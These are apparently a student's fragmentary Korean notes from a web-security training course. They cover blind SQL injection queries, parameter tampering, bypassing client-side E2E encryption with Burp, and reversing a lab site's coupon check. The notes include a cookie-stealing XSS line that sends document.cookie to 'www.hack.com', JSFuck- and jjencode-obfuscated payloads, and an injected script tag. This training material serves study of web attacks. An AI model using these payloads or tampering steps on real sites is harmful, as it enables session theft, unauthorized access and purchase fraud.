3 byte 1byte 0~255 0x00 0xFF 
%__%__

= %3d > %3e

%00%00%00 ->


ascii > 127 
64
32
16
8
4
2
1


select name from member
select name from (select name, rownum as rnum from member) where rnum = 1
(select length(name) from (select name, rownum as rnum from member) where rnum = 1) > 0

(select ascii(substr(name,1,1)) from (select name, rownum as rnum from member) where rnum = 1) > 0

1번째 문자열 길이 : 3
1번째 글자 : 15382912
2번째 글자 : 15500472
3번째 글자 : 15506089

%ea%b9%80%ec%84%b8%ec%9a%a9

 max = 17000000
result = binarySearch()
if result == 1:
    max = max * 1000

hex()
encodedKorean = '%ea%b9%80'
urllib.parse.unquote(encodedKorean)

pppp2 : U2FsdGVkX189sguCuVOCA7dyoazCm4qWMJnkeYKOjCQ=
admin : U2FsdGVkX1%2F%2Fbn3F2Cp5W%2FriESkvC4bRCtUtu6xSqhs%3D


<input type="hidden" name="encryptid" value="">

* 파라미터 변조
- 사용자의 입력값을 한 파라미터라도 검증을 하지 않으면 권한탈취, 권한상승, 인증우회...
  하지말라는거 되는 거 
- 서버(Back-end) 사용자 입력값을 검증!
- 클라이언트,Javscript,웹브라우저(Front-end)에 하면 사실 무쓸모지만 안하는거보단 낫다?
전화번호 010-0000-0000 
이메일   ____@____.___

- Javascript Analysis, E2EE
 


 <script src="jquery_1.8.0.js"></script>
 <script src='test.js'></script>

 test.js
$\



<html>

<body>

<button onclick="buttonclick()">
<img onerror="스크립트">

<script src='test.js'></script>



</body>

</html>




# test.js
   스크립트 실행;
   var button = document.getelement ....
   button.onclick(function(){
    ___
   })
   var buttonclick = function() {

   }

alert('xss') -> print()
prompt('')   -> input() <- E2E 



var input = prompt('숫자를 입력하세요');




 웹브라우저                             서버
                       <----------------
           ---------> 00은행 --------->
        <------- js (ajax localhost:11523 <---                            
  localhost:11523
  요청) -> reponse 나깔려있어
        --------> 깔려있데 --------->  
         <------  정상사용해 ---------              
    나 지금 거래 ---->    요청 -0-->>>   랜덤으로 암호화키
        <----- 암호화js  <--------
     거래정보를 암호화 1234 ----> 요청  ->   복호화 1234 이체 처리


윈도우 솔루션         tcp              서버
             <------- 암호화키 ------
   ㅇㅋ 하드
   암호문      ------> 암호문 ------>   복호화


astx 안x 세이프 트랜젝션

burp -> 버프끄고 브라우저도 다끔
개발자도구 -> 다꺼
우클릭 -> 막고 복사 스크린샷

location.href="www.hack.com/?cookie="+document.cookie;

slkdjlkcacklcdalk
[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]][([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((!![]+[])[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+([][[]]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+!+[]]+(+[![]]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+!+[]]]+(!![]+[])[!+[]+!+[]+!+[]]+(+(!+[]+!+[]+!+[]+[+!+[]]))[(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([]+[])[([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]][([][[]]+[])[+!+[]]+(![]+[])[+!+[]]+((+[])[([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[+!+[]+[+!+[]]]+(!![]+[])[!+[]+!+[]+!+[]]]](!+[]+!+[]+!+[]+[!+[]+!+[]])+(![]+[])[+!+[]]+(![]+[])[!+[]+!+[]])()([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]][([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((!![]+[])[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+([][[]]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+!+[]]+([]+[])[(![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(!![]+[])[+[]]+([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]()[+!+[]+[!+[]+!+[]]]+((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[+[]]+(![]+[])[!+[]+!+[]+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]+[+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]])[(![]+[])[!+[]+!+[]+!+[]]+(+(!+[]+!+[]+[+!+[]]+[+!+[]]))[(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([]+[])[([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]][([][[]]+[])[+!+[]]+(![]+[])[+!+[]]+((+[])[([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[+!+[]+[+!+[]]]+(!![]+[])[!+[]+!+[]+!+[]]]](!+[]+!+[]+!+[]+[+!+[]])[+!+[]]+(![]+[])[!+[]+!+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(!![]+[])[+[]]]((!![]+[])[+[]])[([][(!![]+[])[!+[]+!+[]+!+[]]+([][[]]+[])[+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(!![]+[])[!+[]+!+[]+!+[]]+(![]+[])[!+[]+!+[]+!+[]]]()+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([![]]+[][[]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]](([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]][([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((!![]+[])[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+([][[]]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+!+[]]+(![]+[+[]])[([![]]+[][[]])[+!+[]+[+[]]]+(!![]+[])[+[]]+(![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+([![]]+[][[]])[+!+[]+[+[]]]+([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(![]+[])[!+[]+!+[]+!+[]]]()[+!+[]+[+[]]]+![]+(![]+[+[]])[([![]]+[][[]])[+!+[]+[+[]]]+(!![]+[])[+[]]+(![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+([![]]+[][[]])[+!+[]+[+[]]]+([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(![]+[])[!+[]+!+[]+!+[]]]()[+!+[]+[+[]]])()[([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((![]+[+[]])[([![]]+[][[]])[+!+[]+[+[]]]+(!![]+[])[+[]]+(![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+([![]]+[][[]])[+!+[]+[+[]]]+([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(![]+[])[!+[]+!+[]+!+[]]]()[+!+[]+[+[]]])+[])[+!+[]])+([]+[])[(![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(!![]+[])[+[]]+([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]()[+!+[]+[!+[]+!+[]]])())


$=~[];$={___:++$,$$$$:(![]+"")[$],__$:++$,$_$_:(![]+"")[$],_$_:++$,$_$$:({}+"")[$],$$_$:($[$]+"")[$],_$$:++$,$$$_:(!""+"")[$],$__:++$,$_$:++$,$$__:({}+"")[$],$$_:++$,$$$:++$,$___:++$,$__$:++$};$.$_=($.$_=$+"")[$.$_$]+($._$=$.$_[$.__$])+($.$$=($.$+"")[$.__$])+((!$)+"")[$._$$]+($.__=$.$_[$.$$_])+($.$=(!""+"")[$.__$])+($._=(!""+"")[$._$_])+$.$_[$.$_$]+$.__+$._$+$.$;$.$$=$.$+(!""+"")[$._$$]+$.__+$._+$.$+$.$$;$.$=($.___)[$.$_][$.$_];$.$($.$($.$$+"\""+$.$_$_+(![]+"")[$._$_]+$.$$$_+"\\"+$.__$+$.$$_+$._$_+$.__+"('\\"+$.__$+$.$$$+$.___+"\\"+$.__$+$.$$_+$._$$+"\\"+$.__$+$.$$_+$._$$+"');"+"\"")())();



productid=62&content=af98awe9foawlkefjew&price1=1234&price2=123&shipment=30000

e2e_data=awklfjweklflkwqefewlkqjfklwqff


* 파라미터 변조 대응방안
-> 서버에서 해당 값을 검증
-> E2E솔루션 -> 파라미터가 암호화

어차피 파라미터 다 암호화되니까 변조 못하지않냐
이러면 양호아니냐 -> 

CSRF -> 그럼 게시판에 XSS 조치하면 되는거아니냐

                     -> 메모리 평문
기존 E2EE 
입력한게 -> 웹브라우저 복호화 -> 웹브라우저 js 암호화 -> 서버 통신    일반

확장 E2EE
입력하자마자 동시에 암호화 -> 웹브라우저 -> js -> 서버까지 


1. Javscript 실행 부분 찾기
 -> 태그 내 이벤트 핸들러, 스크립트 내 이벤트 핸들러 찾기 <- html , js 소스코드 확인
 -> 함수 명 유추 개발자 도구 -> 소스 -> Ctrl+shift+f 혹은 우클릭-> 전체 파일 검색

2. Burp js도 intercept 되도록 설정
 response 에서 수정

3. 같은 부분 계속해서 바꿔놓고 싶은 경우
 cookie=sessionid 

 Proxy Match & Replace 라는 기능을 이용

함수 실행하는 방법

fucntion noticefn() {
   var url = "ldakjf" + "asdf"
}
noticefn();

개발자도구의 콘솔 탭에서 해당 페이지에서 선언된 함수를 직접 호출
숨겨진 함수 실행, 권한 없이 해당기능 사용
암호화 복호화 함수 실행 -> 내가 원하는 문자열을 암호화 하거나 복호화


<form id="searchFrom" action="noticeview.php" method="GET">
 <input name="board_id" value="17">
</form>


https://elms2.skinfosec.co.kr:8084/exam50/noticeview.php?board_id=17


* 쇼핑몰
문제 5번 -> 6번 -> 11번 -> 15번

<div style="display:none;" class="btn_basic01" onClick="noticewrite('N');">

<script>noticewrite('Y');</script><div style="display:none;" class="btn_basic01" onClick="noticewrite('N');">




<form action="구매" method="post" action="order" onsubmit="암호화함수();">
    <input name="price">
    .....
    ...
</form>



data = prompt('data');
암호화함수(data);

* JS 분석 쇼핑몰 문제 6번 -> 11번 -> 15번

1. 어떻게 풀었는지
2. 정답

DM 보내주세요.

- 문제 의도
5번 : 입력값을 검증하는 if문 우회 (14:50 풀이 완료)
6번 : 아이디의 암복호화 (16:00 풀이 완료)
11번 : 암호화전송 부분 찾아 prompt로 변조할 파라미터 찾기 (16:30 풀이 완료)
15번 : 자바스크립트 분석&역산 (17:00)


function inputCheck() {

    
    var inputValue = $(".inputValue").val();    
    var encInput = encryptString(inputValue);
    $(".inputValue").val(encInput);
    return true;
}

Skinfosec1! : U2FsdGVkX182Ef6f8cEJ%2FPi9iaWVlOpeDrMTT%2BDP2BE%3D
0:U2FsdGVkX1/PFZhGay3/cpOqMzhM2Q4m7zXAYtVd0xo=




var passphrase = "useworldseyongkim";

function encryptMemberid(text) {
    var encrypt = CryptoJS.AES.encrypt(text, passphrase);
    return encrypt.toString();
}

function decryptMemberid(text) {
    var decrypt = CryptoJS.AES.decrypt(text, passphrase);
    return decrypt.toString(CryptoJS.enc.Utf8);
}


내꺼 : U2FsdGVkX18pqfZsyR+JSkkbrHeYb7yi0p/kFbaD1xk=

match : e2edatasend(param);
replace: param=prompt('',param); e2edatasend(param);


function couponValidation() {
    var memberid = $('#memberid').val(); ppp2 
    var md5hash = $('#md5hash').val(); 35
    var couponNum = $('#couponnum').val(); <- 입력한 쿠폰번호
    var charSet = ["S", "e", "y", "o", "n", "g", "-", "K", "i", "m"];
    var prefix = "Eqst";
    var time = Math.floor(new Date().getTime() / 1000000 % 10000).toString()
    var couponfront = "";
    var couponmiddle = "";
    for (i = 0; i < time.length; i++) {
        couponfront += charSet[Number(time[i])];
    }

    var asciisum = 810;

    for (i = 0; i < memberid.length; i++) {
        asciisum += memberid.charCodeAt(i);
    }

    asciisum = String(asciisum).padStart(4, '0');
    for (i = 0; i < asciisum.length; i++) {
        couponmiddle += charSet[Number(asciisum[i])];
    }

    if (couponNum == "") {
        $('#couponerror').text("쿠폰 번호를 입력하세요.");
        return false;
    }
    if (couponNum.length != 15) {
        $('#couponerror').text("쿠폰 번호 길이가 맞지 않습니다.");
        return false;
    }

    var inputmd5 = MD5(couponNum.substr(0,13)).substr(0,2);

    var split = 4;
    alert(prefix + couponfront + couponmiddle + '?' + md5hash);
    if (couponNum.substring(0, split) == prefix) {
        if (couponNum.substring(split * 2, split * 3) == couponmiddle) {
            if (couponNum.substring(split * 1, split * 2) == couponfront) {
                if (couponNum.substr(split * 3 + 1, 2) == md5hash) {
                    if (inputmd5 == md5hash) {
                        return true;
                    }
                }
            }
        }
    }

    prefix + couponfront + couponmiddle + ? + md5hash

    $('#couponerror').text("쿠폰 번호 형식이 맞지 않습니다.");
    return false;
}

Eqstmye-eoSia   b7
Eqstmye-eoSi   ?b7
String.fromCharCode(아스키 번호)